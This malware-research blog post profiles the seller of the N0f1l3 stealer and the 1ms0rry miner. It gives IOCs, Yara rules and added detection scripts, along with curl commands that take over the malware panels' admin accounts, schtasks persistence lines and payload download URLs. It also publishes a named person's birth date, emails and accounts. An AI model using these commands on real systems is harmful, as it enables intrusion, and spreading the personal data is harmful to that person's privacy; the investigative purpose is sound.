- benkow_
- Sunday 8 April 2018
- Sorry. Not sorry 1ms0rry. Atsamaz Gatsoev malware business
- Hey!
- Here we go for another write-up, but this time with some friends :D
- This is the work of MalwareMustDie feat NibbleHunters!
- Greetz to .sS.!, coldshell, fumik0_, siri_urz, VxVault, Cybercrime-Tracker, MalwareMustDie, .sS.! (again) and all the froggy scene.
- This post is a quick reminder for the "malware researcher":
- Developing malware and selling it is lame and illegal.
- Introduction
- In this blog post, we will try to present another malware actor called 1ms0rry. This guy managed to make himself known by selling a password stealer called N0f1l3 on some hacking forums, and you may recognize him as the man behind the miner "1ms0rry-Miner", which has been pretty active in the wild these past months.
- 1ms0rry was selling builders and/or source code for his malware.
- There is a high probability that almost all the C&Cs are controlled by customers and not by 1ms0rry himself.
- This write-up is exclusively about this malware developer, not botmaster(s).
- Malware Zoo
- N0f1l3
- The selling ads (RU/Google translate)
- The malware
- The first one is a malware called N0F1L3, spotted on some forums and sold for $20 per build or $600 for the source code.
- This password stealer was developed for stealing:
- Browser passwords and cookies (Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex)
- Crypto-Currencies wallets (btc, electrum, ltc, eth, bcn, DSH, XMR, ZEC)
- Filezilla passwords
- Every file on the desktop with the extensions .txt .doc .docx .log
- This malware is developed in .NET.
- File artefacts:
- %TEMP%\Directory\Browsers\Passwords.txt
- %TEMP%\Directory\Browsers\Cookies.txt
- %TEMP%\Directory\Browsers\CC.txt
- %TEMP%\Directory\Browsers\Autofill.txt
- %TEMP%\[HIWD].zip
- Directories:
- %TEMP%\Directory\Files\Desktop
- %TEMP%\Directory\Files\Filezilla
- %TEMP%\Directory\Wallets\BitcoinCore
- %TEMP%\Directory\Wallets\Electrum
- %TEMP%\Directory\Wallets\LitecoinCore
- %TEMP%\Directory\Wallets\Ethereum
- %TEMP%\Directory\Wallets\Bytecoin
- %TEMP%\Directory\Wallets\Monero
- %TEMP%\Directory\Wallets\DashCore
- Notice that there is no persistence, neither in the published source code nor in the samples found in the wild.
- In some samples we found this PDB path:
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb
- This path is on 1ms0rry's own computer; we will understand why later.
- An interesting fact here is that this stealer targets Russian browsers too.
- It includes browsers like Yandex Browser, which is rarely used outside Russia.
- The C&C
- The login page:
- The collected logs list:
- Each collected log appears in a separated html file:
- Minimal settings:
- And a search engine:
- The panel is simple but efficient.
- Vulnerabilities
- Since the panel has leaked almost everywhere and the newer versions are patched, let's take a look at the vulnerabilities.
- You can easily change the admin password.
- If you look at the first lines of cmd.php (the gate):
- You just need to send a POST request with 3 parameters, without any authentication, to change the password:
- curl -i -X POST -d 'login=admin&password=lulz&change=1' http://n0f1l3cnc.com/cmd.php --header "Referer: http://n0f1l3cnc.com/settings.php"
- The panel also has some unauthenticated SQLi (SQL injection).
- IOCs
- PDB related:
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb
- CNCs and associated samples:
- Yara:
- rule n0f1l3: N0F1L3
- {
-     meta:
-         description = "N0f1l3 Stealer"
-         date = "2018-04-06"
-         author = "coldshell"
-         reference = "https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html"
-     strings:
-         $mz = {4D 5A}
-         $string1 = "\\Passwords.txt"
-         $string2 = "\\Cookies.txt"
-         $string3 = "\\CC.txt"
-         $string4 = "\\Autofill.txt"
-         $string5 = "\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data"
-     condition:
-         $mz at 0 and all of them
- }
- N0f1l3v2
- We found a N0f1l3v2 in the wild.
- This sample was found injected by a malware crypter named "Paradox Crypter".
- The crypter c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 injects the sample with this PDB path:
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb
- What's new in v2? It's now written in C++ and the stealer also supports Firefox; apart from that, it's just N0f1l3 :)
- 1ms0rry Miner
- Here we go for the 2nd malware: this one is a Loader + Miner.
- The selling ads (RU/Google translate)(click to enlarge):
- Prices:
- CPU version - 3000 rubles
- GPU version - 3000 rubles
- EXTENDED version - 5500 rubles
- PRIVATE version - from $ 2000 (discussed individually)
- MULTIACC version - 40 000 rubles / month
- SOURCE - 200 000 rubles
- Bitcoin wallet substitution module - 500 rubles
- Stealer module with admin panel - 2500 rubles
- Resale of licenses is strictly prohibited (starting from 19.01.2018)
- LoaderBot
- LoaderBot is developed in .NET and reuses a lot of code from N0f1l3.
- It has basic features.
- It kills itself if Task Manager or Process Hacker is launched (the "Hides from the task manager, process hacker (absolutely no processes)" feature in the ad).
- The malware installs itself in C:\users\%userprofile%\AppData\Roaming\Windows\
- Persistence is done by:
- Scheduled task: "cmd", "/C "+"schtasks /create /tn \System\\SecurityServiceUpdate /tr %userprofile%\AppData\Roaming\Windows\" + currFilename + " /st 00:00 /du 9999:59 /sc daily /ri 1 /f;
- Registry: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- A .url file pointing to URL=file://path/to/the/malware
- Available features:
- Update
- Download
- Execute
- Connection to the C&C is done by GET requests to http://cnc.com/cmd.php? with the following parameters:
- hwid: Used as bot ID (VolumeSerialNumber)
- timeout: timeout in case of CNC failure
- completed: task ID completed
- Using the User-Agent "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
- So, before infecting the victims with a miner, the attacker installs this loader.
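- The LoaderBot check-in described above (GET to cmd.php with hwid/timeout/completed, fixed Firefox/53.0 User-Agent) can be hunted in proxy logs. The following Python is an added example, not code from the original post: it parses constructed log lines (the sorry.enable.pw / api.enable.pw requests mirror the infection chain shown later in the post) and flags LoaderBot beacons, plus the Rarog User-Agent that chain uses. The log line format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# User-Agent strings quoted in the write-up. The Firefox/53.0 one is a real browser UA,
# so it is only used as a secondary indicator next to a cmd.php beacon, never on its own.
LOADERBOT_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
RAROG_UA = "Mozilla/5.0 (Windows NT 6.1) Rarog/5.0"

# Constructed proxy log lines (not real traffic). Assumed format:
#   <timestamp> <src_ip> <method> <url> "<user-agent>"
SAMPLE_LOG = '''\
2018-04-06T10:00:01Z 10.0.0.5 GET http://sorry.enable.pw/cmd.php?hwid=24C2B6A0 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
2018-04-06T10:00:02Z 10.0.0.5 GET http://sorry.enable.pw/cmd.php?hwid=24C2B6A0&completed=3 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
2018-04-06T10:00:03Z 10.0.0.5 GET http://sorry.enable.pw/cmd.php?timeout=1 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
2018-04-06T10:00:04Z 10.0.0.5 GET http://api.enable.pw/2.0/method/checkConnection "Mozilla/5.0 (Windows NT 6.1) Rarog/5.0"
2018-04-06T10:00:05Z 10.0.0.7 GET http://www.example.com/index.php?hwid=form "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
2018-04-06T10:00:06Z 10.0.0.7 GET http://www.example.com/cmd.php?page=1 "Mozilla/5.0 (X11; Linux x86_64) Firefox/59.0"
'''

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
BEACON_PARAMS = ("hwid", "timeout", "completed")


def classify_request(url, user_agent):
    """Return the indicator names matching one request (empty list if nothing matches)."""
    hits = []
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    # LoaderBot gate: cmd.php queried with one of its three parameters.
    if parts.path.endswith("/cmd.php") and any(p in query for p in BEACON_PARAMS):
        if "completed" in query:
            kind = "completed"       # bot reports a finished task ID
        elif "timeout" in query:
            kind = "timeout"         # bot signals a C&C failure
        else:
            kind = "checkin"         # plain hwid check-in (VolumeSerialNumber)
        hits.append("loaderbot-beacon:" + kind)
        if user_agent == LOADERBOT_UA:
            hits.append("loaderbot-ua")
    if user_agent == RAROG_UA:
        hits.append("rarog-ua")
    return hits


def scan_log(text):
    """Scan proxy log text and return one finding per matching request."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, method, url, ua = m.groups()
        if method != "GET":
            continue
        hits = classify_request(url, ua)
        if hits:
            findings.append({"time": ts, "src": src,
                             "host": urlsplit(url).hostname, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```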
- Miner
- The .NET loader drops a miner developed in C++.
- The first stage installs the final miner:
- copies it to %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe
- launches a scheduled task: schtasks /create /tn \\System\\SecurityService /tr %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
- hides the installed files via attrib +s +h
- checks whether taskmgr.exe or processhacker.exe is running
- detects whether a wallet address is in the clipboard and, if so, replaces it
- uses RunPE to launch a fake attrib.exe (the final miner). RunPE is done via CreateProcessA (suspended) / SetThreadContext / WriteProcessMemory / ResumeThread. This code is a copy-paste from https://github.com/KernelMode/RunPE-ProcessHollowing
- The final payload is a C++ miner based on xmrig:
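- Both the LoaderBot and the miner's first stage persist with the same schtasks pattern (a task under \System\, pointing into an AppData\Roaming drop directory, daily with /ri 1 and /du 9999:59). The following Python is an added example, not code from the original post: it scores process-creation command lines for that pattern. The event records are constructed and their field names are an assumption.

```python
import re

# Task names from the write-up; the doubled backslashes in the quoted .NET/C++ source are
# string escapes, the Task Scheduler sees a single backslash.
KNOWN_TASK_NAMES = {"\\system\\securityserviceupdate", "\\system\\securityservice"}
# Drop directories used by LoaderBot and by the miner's first stage.
DROP_DIRS = ("\\appdata\\roaming\\windows\\", "\\appdata\\roaming\\microsoft\\windows\\")

# Constructed process-creation events (not real telemetry), roughly what Sysmon event 1
# or EDR process telemetry provides. Binary names are placeholders.
SAMPLE_EVENTS = [
    {"pid": 4212, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd /C schtasks /create /tn \\System\\SecurityServiceUpdate "
                "/tr %userprofile%\\AppData\\Roaming\\Windows\\LoaderBot.exe "
                "/st 00:00 /du 9999:59 /sc daily /ri 1 /f"},
    {"pid": 4380, "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /create /tn \\System\\SecurityService "
                "/tr %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe "
                "/st 00:00 /du 9999:59 /sc daily /ri 1 /f"},
    {"pid": 5001, "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /create /tn \"\\Backup\\NightlyBackup\" "
                "/tr \"C:\\Program Files\\Backup\\backup.exe\" /sc daily /st 02:00"},
    {"pid": 5002, "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /query /fo LIST /v"},
]

CREATE_RE = re.compile(r"schtasks(\.exe)?\s.*?/create\b", re.IGNORECASE)
OPT_RE = re.compile(r'/(tn|tr|sc|st|du|ri)\s+("[^"]*"|\S+)', re.IGNORECASE)


def parse_schtasks_create(cmdline):
    """Return the /tn /tr /sc /st /du /ri options of a 'schtasks /create' command line, else None."""
    if not CREATE_RE.search(cmdline):
        return None
    return {m.group(1).lower(): m.group(2).strip('"') for m in OPT_RE.finditer(cmdline)}


def assess_schtasks(cmdline):
    """Return the reasons a schtasks /create command line looks like the 1ms0rry persistence."""
    opts = parse_schtasks_create(cmdline)
    if opts is None:
        return []
    reasons = []
    tn = opts.get("tn", "").lower()
    tr = opts.get("tr", "").lower()
    if tn in KNOWN_TASK_NAMES:
        reasons.append("task name used by 1ms0rry LoaderBot/miner: " + opts["tn"])
    if any(d in tr for d in DROP_DIRS):
        reasons.append("task runs a binary from a user-writable AppData\\Roaming drop directory")
    # Daily task repeated every minute for 9999 hours: an effectively permanent re-launch loop.
    if opts.get("sc", "").lower() == "daily" and opts.get("ri") == "1" and opts.get("du") == "9999:59":
        reasons.append("daily task re-run every minute for 9999 hours (permanent execution loop)")
    return reasons


def scan_events(events):
    """Return a finding (pid + reasons) for every event whose command line matches."""
    findings = []
    for ev in events:
        reasons = assess_schtasks(ev["cmdline"])
        if reasons:
            findings.append({"pid": ev["pid"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f)
```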
- The C&C
- Login page:
- Workers (hi IPv6 :) ):
- Tasks:
- Settings:
- The admin C&C/Market
- When 1ms0rry developed the Miner, he also developed a backend called SorryCoin.
- This panel is used by him and his resellers for building samples and for support purposes.
- Here you can see 1ms0rry showing SorryCoins and asking for new resellers:
- Panel Instructions:
- (Translated from the Russian original.)
- Panel information
- Personal statistics
- Personal user statistics were created to make it convenient to track your own achievements and progress. They show: the total number of builds made, the number of sales, the number of re-crypts/cleanings/updates issued, your position, your registration date, the amount of money earned, the number of blacklisted buyers and your SorryCoins.
- SorryCoins serve to measure your efficiency within the team. For each cleaning/re-crypt/update/sale you are credited a certain number of coins. Every month each team member will receive a bonus from me equal to the number of his coins.
- Builds
- The main page. Used to create miner and bot builds. You need to fill in the fields: pool, pool wallet (for example, for MinerGate: www@mail.ru), pool password (usually x), logger (a link for collecting IPs; if not needed, you can enter anything), link to the admin panel (to the cmd.php file; you can enter anything if the field is not needed), substitution bitcoin wallet (for the bitcoin stealer; you can enter anything if the field is not needed), price (the full amount the client paid), note (you can write anything if the field is not needed), the build type and the version the buyer purchased. After creating the request you need to wait until the status of your build changes from queue to done. Then follow the links, download the files and hand them over to the client.
- Pricing
- The "Pricing" tab lists the official prices of the products and information about your income from the sale of each. They may change, so check once a day.
- Overall statistics
- The overall statistics show the progress of the whole team: the total number of builds, sales, re-crypts/cleanings/updates, team members, money earned and blacklisted buyers.
- Materials
- This tab publishes the latest materials for the miner and information about the versions of the miner, the bot and the stub.
- Blacklist
- This section was created for convenient communication with clients (sarcasm). If you refuse support to someone, you must enter that client into the database and write down his contacts, nickname and the reason for the refusal.
- Visit log
- A page available only to the admin. Displays user visit logs. Makes it possible to detect account sharing.
- Users
- The user (team) database, in which you can track the progress of other members.
- TODO
- A list of things that need to be done. Convenient if you need to write something down. Everyone has an individual notebook; nobody else can view it.
- Panels Overview:
- Vulnerabilities
- As usual, code reuse = vuln reuse. The admin account takeover is still here:
- curl -i -X POST -d 'login=admin&password=mypass&note=&type=admin&useradd=1' http://S0rryCoinCnC/cmd.php --header "Referer: http://S0rryCoinCnC/users.php"
- IOCs
- PDB related:
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\GPULoader\GPULoader\obj\Release\GPULoader.pdb
- c:\Users\User\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
- c:\inetpub\wwwroot\Bot\Miner\obj\Release\LoaderBot.pdb
- C:\Users\gorno\Desktop\RelWithDebInfo\xmrig.pdb
- C:\Users\gorno\Desktop\[NEW] builder\Miner\Release\winhost.pdb
- c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
- CNCs and associated samples:
- Yara:
- rule 1ms0rryMiner: 1ms0rryMiner
- {
-     meta:
-         description = "1ms0rry Miner"
-         date = "2018-04-06"
-         author = "benkow_"
-         reference = "https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html"
-     strings:
-         $mz = {4D 5A}
-         $string1 = "?hwid="
-         $string2 = "&completed="
-         $string3 = "?timeout=1"
-         $string4 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
-         $string5 = "LoaderBot.Properties.Resources"
-     condition:
-         $mz at 0 and all of them
- }
- Misc
- Timeline (click to enlarge):
- Attack vectors
- Some campaigns using 1ms0rry malware:
- Fake fonts: https://www.malware-traffic-analysis.net/2017/11/27/index.html or https://www.malware-traffic-analysis.net/2017/11/12/index.html
- Fake Flash installer : https://www.malware-traffic-analysis.net/2018/01/02/index2.html
- https://www.hybrid-analysis.com/sample/e6aeef24c04a1d327e9b8337ca50c74f686ca041ac161a130ca31003ceaaaa7e?environmentId=100 : This sample is really interesting.
- The infection chain is:
- github.com/vaio666999/2/blob/master/GoogleUpdater.exe << LoaderBot :: sorry.enable.pw/cmd.php?hwid=24C2B6A0
- github.com/vaio666999/2/raw/master/GoogleUpdate.exe << Rarog :: api.enable.pw/2.0/method/checkConnection
- github.com/vaio666999/2/raw/master/xmrig32.exe User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
- xmrig32.exe -o xmr.pool.minergate.com:45560 -u stasmiomi@gmail.com -p x -k -t 1
- 61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992 is Rarog
- Backdoored software:
- efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8 - RDP Bruter
- 76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28 - WinDjView setup
- c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 - Paradox Crypter
- Competitive analysis
- This actor is really active on his GitHub. Thanks to him, it is a gold mine of information about what is going on in the seller forums. He decompiled a bunch of malware, analyzed them on telegra.ph and pushed all the sources to his repository. This is a good way for him to check that there is no copycat of his miner. For example, when he analyzed a miner developed by EvilBanana, he explicitly mentioned that it is a bad copy of "his" miner:
- The highlighted sentence means "this miner turned out to be my miner of the first version, but it's a little broken for some reason".
- He reviewed a variety of malware/tools (miners, botnets, loaders...) and tried to explain whether the features were really well developed and effective, or just basic crappy stuff.
- Reviews are available here:
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Dzotra-12-31
- http://telegra.ph/Analiz-botneta-DarkSky-12-30
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Hostis666-12-20
- http://telegra.ph/Analiz-skrytogo-majnera-ot-GucciMine-12-05
- http://telegra.ph/Pishem-kejlogger-na-C-12-07
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Proga-12-10
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Eduard1337Vans-12-10
- http://telegra.ph/Pishem-nerezidentnyj-RunPE-loader-na-C-12-12
- http://telegra.ph/Analiz-skrytogo-majnera-ot-EvilBanana-ims0rry-12-25
- http://telegra.ph/Pishem-miniatyurnyj-HTTP-flooder-na-Python-3-12-28
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Hawksh-01-01
- http://telegra.ph/Pishem-DDOS-bota-na-C-CHast-1-02-04
- http://telegra.ph/Analiz-stillera-ot-xZist-01-06
- http://telegra.ph/Pishem-loader-s-avtoudaleniem-na-C-01-09
- http://telegra.ph/Analiz-majnera-ot-EgorSa1dy-02-22
- Forks
- Some fork examples:
- FelixHTTP (N0f1l3 fork):
- Ref:
- https://twitter.com/siri_urz/status/974205197407932416
- 40089ea9af2c1191fd9dfec5c49d1c37809b9eae8609bcaa810346e81ca3384a
- freexmr.ru
- BUMBLEBEE MinerPanel:
- Ref:
- https://twitter.com/malwrhunterteam/status/956155159469608960
- ih803741.myihor.ru
- EnlightenedHTTP
- Ref:
- https://twitter.com/ViriBack/status/962051515526520832
- 179.43.147.227/mine/
- v90327ux.beget.tech
- 1754d64016c758a65cb85df328ffd502a7255a6855d976e3bdeb497f95201848
- Evrial
- Evrial (https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/) uses code from 1ms0rry for sure:
- Who is 1MS0RRY ?
- Now let's try to understand who 1ms0rry is.
- We know that he has:
- a Twitter account: https://twitter.com/ims0rry_off
- a Telegram account: https://t.me/ims0rryblog
- a Github account: https://github.com/ims0rry/
- Let's try to get the nickname and the email used to commit to the GitHub account.
- This command gives us (full details in the annex section):
- gornostay322@mail.ru
- lordatsa@mail.ru
- your_email@whatever.com
- with the nicknames:
- Gatsoev
- hype
- ims0rry
- s0rry
- Your Name
- lordatsa@mail.ru gives us a mail.ru account: https://my.mail.ru/mail/lordatsa/photo
- We now have a name: Аца Гацоев (Atsa Gatsoev)
- All this information helps us find this Weblancer profile: https://www.weblancer.net/users/hypega/
- This profile is interesting because:
- the name Ацамаз Гацоев (Atsamaz Gatsoev) is the same as on the mail.ru account
- the username used is hypega; "hype" was used to commit on GitHub, and hypega stands for "hypeGatsoev"
- the personal website in the profile information is http://lordatsa.wix.com/gatsoevsummary, and lordatsa is used as the username for mail.ru
- http://lordatsa.wix.com/gatsoevsummary is also interesting:
- VK Account: https://vk.com/quiet_and_invisible
- G+ account: https://plus.google.com/u/0/109976643017066209762/posts/p/pub
- The VK account looks down, but the photos in the G+ account point to 1ms0rry again:
- The G+ account allows us to switch to the related Youtube account:
- Now, take a deeper look at this video: https://youtu.be/zPRo3hkVbrQ?t=4
- This directory "[NEW] builder" on the desktop reminds us of the LoaderBot PDB path:
- c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
- In https://youtu.be/KUvLk20-NZk?t=6, at 6 seconds, we can see Themida and a local path C:\Users\gorno
- In https://www.youtube.com/watch?v=KUvLk20-NZk, at 1 second, we can see the viruscheckmate user, which is hypega (again)
- His freelancer account is interesting too: https://freelance.ru/hypega.
- It allows us to retrieve 2 links:
- * A Portfolio website: lordatsa.wix.com/e-consultant (via https://freelance.ru/hypega/elektronny-konsultant-2810410.html)
- * A GitHub account: github.com/Gatsoev/Nerve_MobileApp (via https://freelance.ru/hypega/pr-agent-2966193.html)
- This GitHub account is a perfect proof.
- Let's take a look, for example, at https://github.com/Gatsoev/csgo.tm-fakeSellExtension.
- Curious, isn't it? It looks like the GitHub account was just renamed.
- We now have enough proof to link 1ms0rry to Ацамаз Гацоев / Atsamaz Gatsoev.
- Who the hell is Atsamaz Gatsoev? We can find a potential picture of him in his Weblancer profile:
- Confirmed by Alan Salbiev from Education Ministry on a Facebook post.
- Alan Salbiev describes 1ms0rry like that:
- Google translate:
- Atsamaz Gatsoev.
- 11th-grade student from Vladikavkaz.
- He ran and published in his blog more than 20 research papers in the field of information security, in particular virology,
- namely: analysis of the protection and cracking of various malicious software, methods of cyber attacks and protection against them.
- Over 1,400 people subscribed to it.
- On December 2-3, 2017, the first hackathon among high school students for the prize of the Head of the Republic was held in Vladikavkaz,
- in which Atsamaz acted as a mentor.
- Atsamaz organized and conducted twice a thematic information security Olympiad in the task-based CTF (Capture the Flag) format,
- which was attended by over 100 people from different cities and countries.
- In addition, with the direct participation of Atsamaz (design, commissioning and start-up), an application based on the principles
- of a distributed data registry (blockchain technology) has been implemented in the work of our Office.
- On February 25, 2018, at a sports hacking competition at ITMO University, our hero confidently beat rivals from Komsomolsk-on-Amur,
- Khanty-Mansiysk, Penza, Pyatigorsk, etc. As a result, a schoolboy from Vladikavkaz entered the top 15 in St. Petersburg.
- Atsamaz has a dream: to enter ITMO University. Our Office will provide every possible assistance to a talented guy.
- Special mention should be made that behind Atsamaz's successes lies the great work of his parents, who were able to instill in him
- awareness, independence, the desire for knowledge and hard work. Take an example from them.
- It's easy to protect against malware when you develop it, isn't it?
- TL;DR:
- (We only keep information related to his malware activities.)
- Name: Ацамаз Гацоев, Atsamaz Gatsoev,
- Born: 1997 Aug. 14
- Location: Tskhinvali region
- Nicknames: 1ms0rry, gorno, hypega, Gatsoev, lordatsa, atsam
- Email: lordatsa@mail.ru gornostay322@mail.ru
- Social: https://vk.com/quiet_and_invisible https://twitter.com/ims0rry_off https://github.com/ims0rry/ https://plus.google.com/u/0/109976643017066209762/
- There is enough information to know exactly who 1ms0rry is :)
- Conclusion
- Obviously, this write-up doesn't cover every malware (you can find some telegra.ph bot), but there is enough data if somebody needs to go deeper.
- This is not a major threat actor: the malware he developed is not really advanced and the web panels are basic (except for the design!), but the SorryCoin backend was interesting.
- It is obvious that Ацамаз Гацоев is a malware developer/reseller here, and not a researcher or a red-teamer developing malware for PoC purposes.
- Just in case, we archived all the links (forum, twitter, telegraph...) on archive.org :).
- That's all folks!
- We hope you enjoyed the read; if you need more information, don't hesitate to ping us.
- Thanks again to MalwareMustDie and .sS.! for the awesome work, and greetz to NibbleHunters.